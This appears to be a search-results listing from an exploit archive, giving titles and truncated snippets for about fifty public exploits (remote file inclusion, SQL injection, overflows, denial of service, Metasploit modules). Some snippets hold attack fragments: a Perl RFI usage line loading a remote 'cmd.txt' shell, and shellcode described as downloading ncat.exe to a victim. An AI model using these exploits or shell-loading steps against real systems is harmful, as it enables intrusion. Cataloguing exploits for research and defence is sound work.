41207 matches found
FlashBB 1.1.8 - phpbb_root_path Remote File Inclusion
FlashBB 1.1.8 - phpbbrootpath Remote File Inclusion !/usr/bin/perl TUFaT FlashBB perl flashBB.pl http://target.com/flashbb http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; Contact: h4ntu use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1;...
ezusermanager 1.6 - Remote File Inclusion
ezusermanager 1.6 - Remote File Inclusion Title : ezUserManager = v1.6 Remote File Inclusion Vulnerability - URL : http://www.ezusermanager.com/ - Dork : "powered by ezUserManager" - Author : OLiBekaS - contact : olibekasatgmail.com - greetz : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster a...
dotProject 2.0 - modulesprojectsgantt2.php?dPconfig[root_dir] Remote File Inclusion
dotProject 2.0 - modulesprojectsgantt2.php?dPconfigrootdir Remote File Inclusion source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input...
EnterpriseGS 1.0 rc4 - Remote Command Execution
EnterpriseGS 1.0 rc4 - Remote Command Execution works against PHP5 usage: launch from Apache, fill in requested fields, then go! Sun-Tzu: "Thus the energy developed by good fighting men is as the momentum of a round stone rolled down a mountain thousands of feet in height. So much on the subject ...
Veritas NetBackup 45 - Volume Manager Daemon Remote Buffer Overflow
Veritas NetBackup 45 - Volume Manager Daemon Remote Buffer Overflow / DESCRIPTION Veritas NetBackup Stack Overflow tcp/13701 "Volume Manager Daemon" Module Advisories http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336 http://www.frsirt.com/english/advisories/2005/2349 USAGE...
Multiple Vendor BIOS - Keyboard Buffer Password Persistence (2)
Multiple Vendor BIOS - Keyboard Buffer Password Persistence 2 // source: https://www.securityfocus.com/bid/15751/info Multiple vendors fail to clear the BIOS Basic Input-Output System keyboard buffer after reading the preboot authentication password during the system startup process. Depending on...
SoftBiz B2B trading Marketplace Script 1.1 - products.php?cid SQL Injection
SoftBiz B2B trading Marketplace Script 1.1 - products.php?cid SQL Injection source: https://www.securityfocus.com/bid/15652/info Softbiz B2B Trading Marketplace is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize...
Snort 2.4.0 2.4.3 - Back Orifice Pre-Preprocessor Remote (Metasploit)
Snort 2.4.0 2.4.3 - Back Orifice Pre-Preprocessor Remote Metasploit $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...
IPSwitch IMAP Server - LOGON Remote Stack Overflow
IPSwitch IMAP Server - LOGON Remote Stack Overflow / IpSwitch IMAP Server LOGON stack overflow. Software Hole discovered by iDEFENSE POC written by nolimit and BuzzDee First, some information for the few of you that know how this stuff works. The reason you see no SP2 or 2003 offsets is because o...
gld 1.4 - Postfix Greylisting Daemon Remote Format String
gld 1.4 - Postfix Greylisting Daemon Remote Format String / 0x82-meOw-linuxerforever - gld 1.4 remote overflow format string exploit. c 2005 Team INetCop Security. Nickname of this code is, Kill two bird with one stone.' or, One shot, two kill!.' hehehe ;-D Advisory URL:...
Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Remote (PoC)
Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Remote PoC / source: https://www.securityfocus.com/bid/11488/info It is reported that an integer underflow vulnerability is present in the iptables logging rules of the Linux kernel 2.6 branch. A remote attacker may exploit this...
WebHost Automation Helm Control Panel 3.1.x - Multiple Input Validation Vulnerabilities
WebHost Automation Helm Control Panel 3.1.x - Multiple Input Validation Vulnerabilities source: https://www.securityfocus.com/bid/11586/info Helm Control Panel is reported prone to multiple vulnerabilities. These include an SQL injection issue and an HTML injection vulnerability. A remote attacke...
Master of Orion III 1.2.5 - Denial of Service
Master of Orion III 1.2.5 - Denial of Service / by Luigi Auriemma / include include include ifdef WIN32 include / Header file used for manage errors in Windows It support socket and errno too this header replace the previous sockerrX.h / include include void stderrvoid char error;...
Apple Mac OSX - Panther Internet Connect Privilege Escalation
Apple Mac OSX - Panther Internet Connect Privilege Escalation Date: 25.07.2004 Author: B-r00t. 2004. Email: B-r00t Vendor: Apple Operating System: OSX Panther Possibly Previous Versions. Application: Internet Connect.app Tested: Panther 10.3.4 Internet Connect v1.3 Problem: Internet Connect allow...
Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)
Microsoft Windows Server 2000 - Utility Manager All-in-One MS04-019 / COROMPUTER2004 Crpt Utility Manager exploit v2.666 modified by kralor Crpt It gets system language and sets windows names to work on any win2k :P Feel free to add other languages : v2.666: added autonomous allinone remote...
NETObserve 2.0 - Authentication Bypass
NETObserve 2.0 - Authentication Bypass source: https://www.securityfocus.com/bid/9319/info NETObserve is prone to a vulnerability that may permit remote unauthenticated users to access functions of the software. Due to the nature of the software, this could permit an attacker to execute commands...
IA WebMail Server 3.x - iaregdll.dll 1.0.0.5 Remote Overflow
IA WebMail Server 3.x - iaregdll.dll 1.0.0.5 Remote Overflow !/usr/bin/perl -w IA WebMail 3.x iaregdll.dll version 1.0.0.5 Remote Exploit Application Specific Shellcode: URL Downloader - www elitehaven net/ncat.exe downloaded - c:\nc.exe created By Peter Winter-Smith peter4020 hotmail com Shellco...
DCP-Portal 5.5 - advertiser.php?Password SQL Injection
DCP-Portal 5.5 - advertiser.php?Password SQL Injection source: https://www.securityfocus.com/bid/8739/info Multiple SQL Injection vulnerabilities have been discovered that affect DCP-Portal scripts. These issues are likely due to a lack of sufficient sanitization performed on user supplied URI...
Cisco IOS - cisco-bug-44020.c IPv4 Packet Denial of Service
Cisco IOS - cisco-bug-44020.c IPv4 Packet Denial of Service // / cisco-bug-44020.c - Copyright by Martin Kluge / / / / Feel free to modify this code as you like, as long as you include / / the above copyright statement. / / / / Please use this code only to check your OWN cisco...
OpenSSHPAM 3.6.1p1 - Remote Users Discovery Tool
OpenSSHPAM 3.6.1p1 - Remote Users Discovery Tool / SSHBRUTE - OpenSSH/PAM Proof of concept code by Maurizio Agazzini Tested against Red Hat, Mandrake, and Debian GNU/Linux. Reference: http://lab.mediaservice.net/advisory/2003-01-openssh.txt $ tar xvfz openssh-3.6.1p1.tar.gz $ patch -p0 include...
InstaBoard 1.3 - index.cfm SQL Injection
InstaBoard 1.3 - index.cfm SQL Injection source: https://www.securityfocus.com/bid/7338/info It has been reported that multiple input validation errors exist in the index.cfm file included with InstaBoard. Because of this issue, remote attackers may launch SQL injection attacks through the...
MySimpleNews 1.0 - PHP Injection
MySimpleNews 1.0 - PHP Injection source: https://www.securityfocus.com/bid/5865/info MySimpleNews allows users to enter news articles through a web interface. It will allow PHP code to be injected into URI parameters of the 'users.php' script, which will be stored into a MySimpleNews file...
NetBSD 1.x - TalkD User Validation
NetBSD 1.x - TalkD User Validation source: https://www.securityfocus.com/bid/4419/info talkd is a client-server application shipped with many Unix and Linux variants that is used for communication between users locally or remotely. talkd does not perform adequate validation of users making talk...
Phusion WebServer 1.0 - Directory Traversal (2)
Phusion WebServer 1.0 - Directory Traversal 2 source: https://www.securityfocus.com/bid/4117/info Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems. Phusion Webserver is prone to directory traversal attacks. It is possible to break out of...
Microsoft Index Server 2.0 - File Information Full Path Disclosure
Microsoft Index Server 2.0 - File Information Full Path Disclosure source: https://www.securityfocus.com/bid/3339/info The sqlqhit.asp sample file is used for performing web-based SQL queries. Malicious users could send specifically crafted HTTP request to an Internet Information Services server...
ID Software Quake 3 - SMURF Denial of Service
ID Software Quake 3 - SMURF Denial of Service // source: https://www.securityfocus.com/bid/3060/info Quake 3 network play features contain a remotely exploitable denial of service vulnerability. A hostile client program can be used to generate a large number of forged client queries on behalf ...
Active Classifieds 1.0 - Arbitrary Code Execution
Active Classifieds 1.0 - Arbitrary Code Execution source: https://www.securityfocus.com/bid/2942/info Active Classifieds is a CGI package that provides an online classified advertisement listing and management system. An origin validation error exists in the Free Edition of Active Classifieds tha...
keware technologies homeseer 1.4 - Directory Traversal
keware technologies homeseer 1.4 - Directory Traversal source: https://www.securityfocus.com/bid/2085/info Keware Technologies HomeSeer is a home automation application which enables users to control various housewares and appliances locally or remotely via a web interface. It is possible for a...
PHP 3.0.164.0.2 - Remote Format Overflow
PHP 3.0.164.0.2 - Remote Format Overflow / PHP 3.0.16/4.0.2 remote format overflow exploit. Copyright c 2000 Field Marshal Count August Anton Wilhelm Neithardt von Gneisenau my regards to sheib and darkx All rights reserved Pascal Boucheraine's paper was enlightening THERE IS...
LBL Traceroute 1.4 a5 - Heap Corruption (1)
LBL Traceroute 1.4 a5 - Heap Corruption 1 // source: https://www.securityfocus.com/bid/1739/info Traceroute is a well-known network diagnostic tool used for analyzing the path on a network between two hosts. On unix systems, traceroute is typically installed setuid root because of its use of raw...
xsoldier (FreeBSD 3.3Linux Mandrake 7.0) - Local Buffer Overflow (2)
xsoldier FreeBSD 3.3Linux Mandrake 7.0 - Local Buffer Overflow 2 / source: https://www.securityfocus.com/bid/871/info Certain versions of FreeBSD 3.3 Confirmed and Linux Mandrake confirmed ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid...
ETL Delegate 5.9.x6.0.x - Remote Buffer Overflow
ETL Delegate 5.9.x6.0.x - Remote Buffer Overflow // source: https://www.securityfocus.com/bid/808/info The Delegate proxy server from ElectroTechnical Laboratory has numerous (several hundred, according to the original poster) unchecked buffers that could be exploited to remotely compromise the...
Microsoft Windows NT 4.0SP1SP2SP3SP4SP5SP6 - Services.exe Denial of Service (1)
Microsoft Windows NT 4.0SP1SP2SP3SP4SP5SP6 - Services.exe Denial of Service 1 source: https://www.securityfocus.com/bid/754/info A specially crafted packet can cause a denial of service on an NT 4.0 host, rendering local administration and network communication nearly unusable. This attack will...
Caldera OpenUnix 8.0UnixWare 7.1.1 HP HP-UX 11.0 Solaris 7.0 SunOS 4.1.4 - rpc.cmsd Buffer Overflow (1)
Caldera OpenUnix 8.0UnixWare 7.1.1 HP HP-UX 11.0 Solaris 7.0 SunOS 4.1.4 - rpc.cmsd Buffer Overflow 1 // source: https://www.securityfocus.com/bid/524/info There is a remotely exploitable buffer overflow vulnerability in rpc.cmsd which ships with Sun's Solaris and HP-UX versions 10.20, 10.30 and...
Compaq Client Management Agents 3.704.0 Insight Management Agents 4.21 A4.22 A4.30 A Intelligent Cluster Administrator 1.0 Management Agents for Workstations 4.20 A Server Management Agents 4.23 Survey Utility 2.0 - Web File Access
Compaq Client Management Agents 3.704.0 Insight Management Agents 4.21 A4.22 A4.30 A Intelligent Cluster Administrator 1.0 Management Agents for Workstations 4.20 A Server Management Agents 4.23 Survey Utility 2.0 - Web File Access source: https://www.securityfocus.com/bid/282/info A vulnerabilit...
eLection 2.0 - id SQL Injection
eLection 2.0 - id SQL Injection Title: eLection 2.0 - 'id' SQL Injection Date: 2020-02-21 Exploit Author: J3rryBl4nks Vendor Homepage: https://sourceforge.net/projects/election-by-tripath/ Software Link: https://sourceforge.net/projects/election-by-tripath/files/Version 2.0 Tested on Ubuntu 19/Ka...
SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
SOPlanning 1.45 - Cross-Site Request Forgery Add User Exploit Title: SOPlanning 1.45 - Cross-Site Request Forgery Add User Date: 2020-02-14 Exploit Author: J3rryBl4nks Vendor Homepage: https://www.soplanning.org/en/ Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/...
phpMyChat Plus 1.98 - pmc_username SQL Injection
phpMyChat Plus 1.98 - pmcusername SQL Injection Title: phpMyChat Plus 1.98 - 'pmcusername' SQL Injection Date: 2020-02-13 Exploit Author: J3rryBl4nks Vendor Homepage: http://ciprianmp.com/latest/ Software Link: https://sourceforge.net/projects/phpmychat/files/phpMyChatPlus/ Version MyChat Plus 1....
DVD Photo Slideshow Professional 8.07 - Name Buffer Overflow
DVD Photo Slideshow Professional 8.07 - Name Buffer Overflow Exploit Title: DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow Exploit Author : ZwX Exploit Date: 2020-02-10 Vendor Homepage : http://www.picture-on-tv.com/ Tested on OS: Windows 10 v1803 Social: twitter.com/ZwX2a Steps t...
usersctp - Out-of-Bounds Reads in sctp_load_addresses_from_init
usersctp - Out-of-Bounds Reads in sctploadaddressesfrominit ''' usersctp is SCTP library used by a variety of software including WebRTC. There is a vulnerability in the sctploadaddressesfrominit function of usersctp that can lead to a number of out-of-bound reads. The input to...
Wago PFC200 - Authenticated Remote Code Execution (Metasploit)
Wago PFC200 - Authenticated Remote Code Execution Metasploit Exploit Title: Wago PFC200 - Authenticated Remote Code Execution Metasploit Date: 2020-02-05 Exploit Author: Nico Jansen 0x483d Vendor Homepage: https://www.wago.com/ Version: 'Wago PFC200 authenticated remote code execution',...
Hospital Management System 4.0 - Persistent Cross-Site Scripting
Hospital Management System 4.0 - Persistent Cross-Site Scripting Exploit Title: Hospital Management System 4.0 - Persistent Cross-Site Scripting Google Dork: N/A Date: 2020-01-02 Exploit Author: FULLSHADE Vendor Homepage: https://phpgurukul.com/ Software Link:...
SpotAuditor 5.3.2 - Base64 Local Buffer Overflow (SEH)
SpotAuditor 5.3.2 - Base64 Local Buffer Overflow SEH Exploit Title: SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow SEH Exploit Author: Kirill Nikolaev Date: 2019-12-06 Vulnerable Software: SpotAuditor Vendor Homepage: http://www.nsauditor.com/ Version: 5.3.2 Software Link:...
Nsauditor 3.1.8.0 - Name Denial of Service (PoC)
Nsauditor 3.1.8.0 - Name Denial of Service PoC Exploit Title: Nsauditor 3.1.8.0 - 'Name' Denial of Service PoC Discovery by: SajjadBnd Date: 2019-11-30 Vendor Homepage: http://www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Tested Version: 3.1.8.0...
InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC)
InduSoft Web Studio 8.1 SP1 - Atributos Denial of Service PoC Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" Denial of Service PoC Discovery by: chuyreds Discovery Date: 2019-11-23 Vendor Homepage: http://www.indusoft.com/ Software Link : http://www.indusoft.com/Products-Downloads Teste...
Adrenalin Core HCM 5.4.0 - strAction Reflected Cross-Site Scripting
Adrenalin Core HCM 5.4.0 - strAction Reflected Cross-Site Scripting Exploit Title: Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting Google Dork: NA Date: 2018-09-06 Exploit Author: Rishu Ranjan Cy83rl0gger Vendor Homepage: https://www.myadrenalin.com/ Software Link:...
Jenkins build-metrics plugin 1.3 - label Cross-Site Scripting
Jenkins build-metrics plugin 1.3 - label Cross-Site Scripting Exploit Title: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting Date: 2019-11-06 Exploit Author: vesche Austin Jackson Vendor Homepage: https://plugins.jenkins.io/build-metrics Version: Jenkins build-metrics plugin 1.3 a...
Ajenti 2.1.31 - Remote Code Exection (Metasploit)
Ajenti 2.1.31 - Remote Code Exection Metasploit Exploit Title: Ajenti 2.1.31 - Remote Code Exection Metasploit Date: 2019-10-29 Exploit Author: Onur ER Vendor Homepage: http://ajenti.org/ Software Link: https://github.com/ajenti/ajenti Version: 2.1.31 Tested on: Ubuntu 19.10 This module requires...
Joomla! 3.4.6 - Remote Code Execution (Metasploit)
Joomla! 3.4.6 - Remote Code Execution Metasploit Exploit Title: Joomla! 3.4.6 - Remote Code Execution Metasploit Google Dork: N/A Date: 2019-10-02 Exploit Author: Alessandro Groppo Vendor Homepage: https//www.joomla.it/ Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6 Version: 3.0...
Podman Varlink 1.5.1 - Remote Code Execution
Podman Varlink 1.5.1 - Remote Code Execution Exploit Title: Podman & Varlink 1.5.1 - Remote Code Execution Exploit Author: Jeremy Brown Date: 2019-10-15 Vendor Homepage: https://podman.io/ Software Link: dnf install podman or https://github.com/containers/libpod/releases Version: 1.5.1 Tested on:...